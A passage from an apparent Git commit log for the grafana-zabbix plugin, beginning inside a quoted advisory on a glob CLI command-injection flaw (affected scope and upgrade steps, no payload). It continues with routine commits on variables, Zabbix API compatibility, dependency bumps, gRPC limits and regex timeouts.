- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[
|
||
|
Jocelyn Collado-Kuri
|
86b7328f39 |
Variables: Allow fetching disabled items for Item type variable (#2109)
This PR adds support for showing disabled items when using the `Item` type template variable. Similar to how we support disabled items today in our query editor: <img width="435" height="254" alt="Screenshot 2025-10-21 at 9 00 11 AM" src="https://github.com/user-attachments/assets/832537c8-84c3-45fe-a85d-b16c8e15f759" /> In this example, the host contains a disabled item `CPU iowait time` <img width="1763" height="46" alt="Screenshot 2025-10-21 at 9 02 08 AM" src="https://github.com/user-attachments/assets/85419e88-280d-4dce-baee-bf403e1de05d" /> Which we can now show and hide from the variable in Grafana: https://github.com/user-attachments/assets/eca9327e-40a6-4852-92e9-71ff1ad9ea32 I also removed some deprecated types and packages :)! Fixes: #2025 --------- Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> |
||
|
Jocelyn Collado-Kuri
|
045c708c69 |
Fix: ensure that applicationids parameter only gets passed when the datasource supports it. (#2110)
Zabbix 5.0.x supported filtering `Problems` feature with `applications`.
When this got removed, we removed the filter dropdown from the UI, but
failed to check whether applications were supported before sending out
the request with the parameters.
This was causing dashboards that had been created with zabbix version
`5.0.x` to fail when querying with newer versions of our plugin with
error: `Invalid params. Invalid parameter "/": unexpected parameter
"applicationids".`
These changes now ensure that we also check whether applications filter
should be supported before sending the backend request to fetch
problems.
How to test:
- use the attached JSON file. This was created using zabbix50 and
applying an `applicationids` filter for `Problems` query type OR
- run the `zabbix50` test environment:
```
cd devenv/zabbix50
docker-compose up -d
```
- create a dashboard that queries for `Problems` and filters with
applications then export the dashboard JSON
- stop the `zabbix50` test environment and start the `zabbix74` test
environment
```
docker-compose stop
cd ../zabbix74
docker-compose up -d
```
- import the dashboard you created above, it should load and work as
expected.
Bottom panel was created using zabbix50 and it used the application
filter. Both panels now load as expected:
<img width="2558" height="1018" alt="Screenshot 2025-10-21 at 2 28
25 PM"
src="https://github.com/user-attachments/assets/9613d59b-3f88-420c-9897-f8d988b3d2f0"
/>
Fixes https://github.com/grafana/grafana-zabbix/issues/1852
|
||
|
dependabot[bot]
|
2d9714a4db |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.279.0 to 0.281.0 (#2114)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.279.0 to 0.281.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.281.0</h2> <h2>What's Changed</h2> <ul> <li>Chore: go.mod upgrades by <a href="https://github.com/ryantxu"><code>@ryantxu</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1413">grafana/grafana-plugin-sdk-go#1413</a></li> <li>Docs: Add frame json schema by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1411">grafana/grafana-plugin-sdk-go#1411</a></li> <li>chore(deps): Update module golang.org/x/oauth2 to v0.32.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1417">grafana/grafana-plugin-sdk-go#1417</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1416">grafana/grafana-plugin-sdk-go#1416</a></li> <li>experimental.DataQuery: add unit test by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1418">grafana/grafana-plugin-sdk-go#1418</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.37.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1421">grafana/grafana-plugin-sdk-go#1421</a></li> <li>experimental: DataQuery: switch from timeRange to _timeRange by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.280.0...v0.281.0</a></p> <h2>Compatibility</h2> <p>The way <code>experimental.DataQuery</code> objects get serialised to JSON has slightly changed, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1420">grafana/grafana-plugin-sdk-go#1420</a></p> <pre><code>gorelease -base v0.280.0 -version v0.281.0 # summary v0.281.0 is a valid semantic version for this release. </code></pre> <h2>v0.280.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/protobuf to v1.36.8 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1393">grafana/grafana-plugin-sdk-go#1393</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1394">grafana/grafana-plugin-sdk-go#1394</a></li> <li>chore(deps): Update module google.golang.org/grpc to v1.75.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1395">grafana/grafana-plugin-sdk-go#1395</a></li> <li>chore(deps): Update module github.com/grafana/pyroscope-go/godeltaprof to v0.1.9 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1397">grafana/grafana-plugin-sdk-go#1397</a></li> <li>chore(deps): Update module github.com/stretchr/testify to v1.11.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1398">grafana/grafana-plugin-sdk-go#1398</a></li> <li>chore(deps): Update module github.com/apache/arrow-go/v18 to v18.4.1 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1396">grafana/grafana-plugin-sdk-go#1396</a></li> <li>chore(deps): Update OpenTelemetry packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1387">grafana/grafana-plugin-sdk-go#1387</a></li> <li>chore(deps): Update module github.com/getkin/kin-openapi to v0.133.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1402">grafana/grafana-plugin-sdk-go#1402</a></li> <li>Build: Move build info to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1399">grafana/grafana-plugin-sdk-go#1399</a></li> <li>E2E: Move e2e mage targets to new package by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1404">grafana/grafana-plugin-sdk-go#1404</a></li> <li>Build: Rename build/info to build/buildinfo by <a href="https://github.com/toddtreece"><code>@toddtreece</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1405">grafana/grafana-plugin-sdk-go#1405</a></li> <li>Chore: Upgade github.com/prometheus/client_golang v1.23.0 => v1.23.2 by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1406">grafana/grafana-plugin-sdk-go#1406</a></li> <li>Feat: add session token support for sigv4 to support auth service by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1410">grafana/grafana-plugin-sdk-go#1410</a></li> </ul> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.279.0 -version v0.280.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>HTTPSettings.SigV4SessionToken: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/httpclient</h1> <h2>compatible changes</h2> <p>SigV4Config.SessionToken: added</p> <p></tr></table> </code></pre></p> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
ismail simsek
|
d4e717c757 | Release v6.0.3 (#2102) | ||
|
ismail simsek
|
a489c588d0 |
Chore: Set grpc limits explicitly (#2101)
Set `MaxReceiveMsgSize` as 32mb and `MaxSendMsgSize` as 100mb |
||
|
Zoltán Bedi
|
1f6ba92d96 | Release 6.0.2 (#2091) | ||
Kristian Bremberg
|
6580bf8f6e |
Refactor regex pattern validation to use timeout-based approach (#2090)
- Remove isPathologicalRegex function and replace with MatchTimeout - Simplify parseFilter by relying on runtime timeout protection - Add comprehensive timeout test for pathological regex patterns - Set 5-second timeout for all compiled regex operations |